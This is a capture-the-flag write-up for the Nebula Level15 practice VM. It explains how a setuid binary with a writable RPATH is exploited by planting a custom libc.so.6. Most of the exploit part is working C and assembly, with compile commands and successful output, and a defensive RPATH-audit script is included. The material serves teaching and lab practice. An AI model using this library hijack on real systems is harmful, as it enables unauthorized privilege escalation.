Vulnerabilities in dynamic-link libraries under Linux

Source: Internet
Author: User

1. Description

Nebula is a Linux virtual machine for practising vulnerability exploitation; its 15th level (Level15) provides a vulnerable program, flag15:

sh-4.2$ ls -l
total 7
-rwsr-x--- 1 flag15 level15 7161 2011-11-20 21:22 flag15
sh-4.2$ whoami
level15

The task is to exploit this setuid program to go from user level15 to user flag15 and execute /bin/getflag.

2. Vulnerability Mining

This is a classic dynamic-link library hijacking problem. First, observe flag15 with strace:

execve("./flag15", ["./flag15"], [/* 19 vars */]) = 0
brk(0)                                  = 0x880e000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
...
open("/var/tmp/flag15/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/sse2", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/sse2", 0xbfe0f594) = -1 ENOENT (No such file or directory)
...
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = 3
...
exit_group(...)                         = ?

This shows that the program loads a dynamic library named libc.so.6 and looks for it under /var/tmp/flag15 (trying the hardware-capability subdirectories such as i686/sse2/cmov first). Since /var/tmp is writable by the current user (level15), a custom libc.so.6 can be placed in that directory for flag15 to link against.


Looking further at the header information of flag15, we found that it does depend on libc.so.6 and was compiled with an RPATH. This means flag15 searches the path /var/tmp/flag15 for its dynamic libraries at run time, and an RPATH is honoured even for a setuid program (whereas LD_PRELOAD is ignored during setuid execution).

sh-4.2$ objdump -p /home/flag15/flag15

/home/flag15/flag15:     file format elf32-i386

Program Header:
    PHDR off    0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
         filesz 0x00000120 memsz 0x00000120 flags r-x
  INTERP off    0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0
         filesz 0x00000013 memsz 0x00000013 flags r--
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x000005d4 memsz 0x000005d4 flags r-x
    LOAD off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**12
         filesz 0x00000108 memsz 0x00000110 flags rw-
 DYNAMIC off    0x00000f20 vaddr 0x08049f20 paddr 0x08049f20 align 2**2
         filesz 0x000000d0 memsz 0x000000d0 flags rw-
    NOTE off    0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2
         filesz 0x00000044 memsz 0x00000044 flags r--
EH_FRAME off    0x000004dc vaddr 0x080484dc paddr 0x080484dc align 2**2
         filesz 0x00000034 memsz 0x00000034 flags r--
   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
         filesz 0x00000000 memsz 0x00000000 flags rw-
   RELRO off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**0
         filesz 0x000000f4 memsz 0x000000f4 flags r--

Dynamic Section:
  NEEDED               libc.so.6
  RPATH                /var/tmp/flag15
  INIT                 0x080482c0
  FINI                 0x080484ac
  GNU_HASH             0x080481ac
  STRTAB               0x0804821c
  SYMTAB               0x080481cc
  STRSZ                0x0000005a
  SYMENT               0x00000010
  DEBUG                0x00000000
  PLTGOT               0x08049ff4
  PLTRELSZ             0x00000018
  PLTREL               0x00000011
  JMPREL               0x080482a8
  REL                  0x080482a0
  RELSZ                0x00000008
  RELENT               0x00000008
  VERNEED              0x08048280
  VERNEEDNUM           0x00000001
  VERSYM               0x08048276

Version References:
  required from libc.so.6:
    0x0d696910 0x00 02 GLIBC_2.0
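As an added defensive check, not part of the original write-up: the script below parses the Dynamic Section of `objdump -p` output like the one above for RPATH/RUNPATH entries and flags any search directory that an unprivileged user could write to or create (the not-yet-existing /var/tmp/flag15 under world-writable /var/tmp is exactly this case). The sample objdump text is constructed from the output above; the isdir and mode_of parameters are hypothetical hooks so the check can be exercised without touching the real filesystem.

```python
import os
import re
import stat

# Constructed sample: the Dynamic Section lines as printed by `objdump -p` on flag15.
SAMPLE_OBJDUMP = """\
Dynamic Section:
  NEEDED               libc.so.6
  RPATH                /var/tmp/flag15
  INIT                 0x080482c0
"""


def rpath_dirs(objdump_output):
    """Return every search directory named by an RPATH or RUNPATH entry."""
    dirs = []
    for line in objdump_output.splitlines():
        m = re.match(r"\s*(RPATH|RUNPATH)\s+(\S+)", line)
        if m:
            dirs.extend(d for d in m.group(2).split(":") if d)
    return dirs


def first_existing_ancestor(path, isdir=os.path.isdir):
    """The searched directory need not exist yet (flag15's does not); what matters
    is the closest existing parent, because that is where it would get created."""
    p = os.path.abspath(path)
    while not isdir(p):
        parent = os.path.dirname(p)
        if parent == p:
            break
        p = parent
    return p


def is_hijackable(rpath_dir, isdir=os.path.isdir, mode_of=lambda p: os.stat(p).st_mode):
    """True when the directory (or its closest existing ancestor) is world-writable,
    i.e. an unprivileged user can place a library where the loader will look."""
    if rpath_dir.startswith("$ORIGIN"):
        return False  # relative to the binary's own directory; audit that path separately
    anchor = first_existing_ancestor(rpath_dir, isdir)
    return bool(mode_of(anchor) & stat.S_IWOTH)


def audit(objdump_output, **fs_hooks):
    """Return the hijackable RPATH/RUNPATH entries found in one binary's objdump output."""
    return [d for d in rpath_dirs(objdump_output) if is_hijackable(d, **fs_hooks)]


if __name__ == "__main__":
    import sys  # usage: objdump -p /path/to/setuid-binary | python3 rpath_audit.py
    print(audit(sys.stdin.read()))
```

Running it over every setuid binary on a host (find / -perm -4000 -type f) turns the manual objdump inspection above into a repeatable check.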

3. Exploit

What remains is to write our custom libc.so.6 into the /var/tmp/flag15 directory, hijack flag15, and run /bin/getflag with its elevated privileges.

The first thing to do is hook a function that flag15 uses at run time; there are two options. One is to declare a function with the GCC __attribute__((constructor)) attribute, which the dynamic loader runs from the shared library's _init entry point before main is reached; the other is to provide our own int __libc_start_main function.

Using the first method, the code is:

sh-4.2$ cat constructor.c
#include <stdlib.h>   /* system() is declared here */

/* Runs automatically when the library is loaded, before main. */
void __attribute__((constructor)) init(void) {
    system("/bin/getflag");
}

Compile:

gcc -shared -fPIC -o libc.so.6 constructor.c


The second method:

sh-4.2$ cat shell.c
#include <stdlib.h>   /* system() is declared here */

/* Replaces the libc entry point that _start calls; main is never reached. */
int __libc_start_main(int (*main)(int, char **, char **), int argc, char **argv,
                      void (*init)(void), void (*fini)(void),
                      void (*rtld_fini)(void), void *stack_end) {
    system("/bin/getflag");
    return 0;
}

Compile:

gcc -shared -fPIC -o libc.so.6 shell.c

This produces libc.so.6. Then execute flag15:

sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference

The output above indicates that a __cxa_finalize symbol is missing, so in either method we can add the following to constructor.c or shell.c:

/* Stub for the symbol the loader expects every libc.so.6 to export. */
void __cxa_finalize(void *d) { return; }

Save the modified constructor.c as contructor1.c and compile again:

sh-4.2$ gcc -shared -fPIC -o libc.so.6 contructor1.c

Then execute:

sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

The message above also complains that the glibc version information is missing, so we supply a version script at compile time.

Compile and execute again:

sh-4.2$ cat version
GLIBC_2.0 {};
sh-4.2$ gcc -shared -fPIC -o libc.so.6 contructor1.c -Wl,--version-script=version
sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

There is still an error: the system function cannot be found. There are two ways to solve this. One is to link statically so that the library satisfies all of its own dependencies (why? Because our libc.so.6 replaces the real C library in the process, no other loaded object can supply system; static linking copies libc's own implementation into our library). The other is to write our own system function in assembly language.

The first method:

sh-4.2$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic -o libc.so.6 contructor1.c
sh-4.2$ /home/flag15/flag15
You have successfully executed getflag on a target account
/home/flag15/flag15: relocation error: /home/flag15/flag15: symbol __libc_start_main, version GLIBC_2.0 not defined in file libc.so.6 with link time reference


The second method:

sh-4.2$ cat shell.c
#include <unistd.h>

/* Stub for the symbol the loader expects every libc.so.6 to export. */
void __cxa_finalize(void *d) {}

/* Replaces the libc entry point that _start calls; main is never reached.
   system() here is our own assembly routine from system.s, not libc's. */
int __libc_start_main(int (*main)(int, char **, char **), int argc, char **argv,
                      void (*init)(void), void (*fini)(void),
                      void (*rtld_fini)(void), void *stack_end) {
    system();
}
sh-4.2$ cat system.s
.section .text
.globl system
system:
    mov $getflag, %ebx      # ebx = path "/bin/getflag"
    xor %edx, %edx          # edx = NULL envp
    push %edx               # argv[1] = NULL
    push %ebx               # argv[0] = path
    mov %esp, %ecx          # ecx = argv
    mov $11, %eax           # eax = 11, the execve system call
    int $0x80
.section .data
getflag:
    .ascii "/bin/getflag\0"
sh-4.2$ gcc -shared -fPIC -o libc.so.6 shell.c system.s -Wl,--version-script=version
sh-4.2$ /home/flag15/flag15
You have successfully executed getflag on a target account

Personally, I find the approach of writing the routine in assembly easier to understand than the static-library build, and I still have not figured out why static linking resolves the system function.

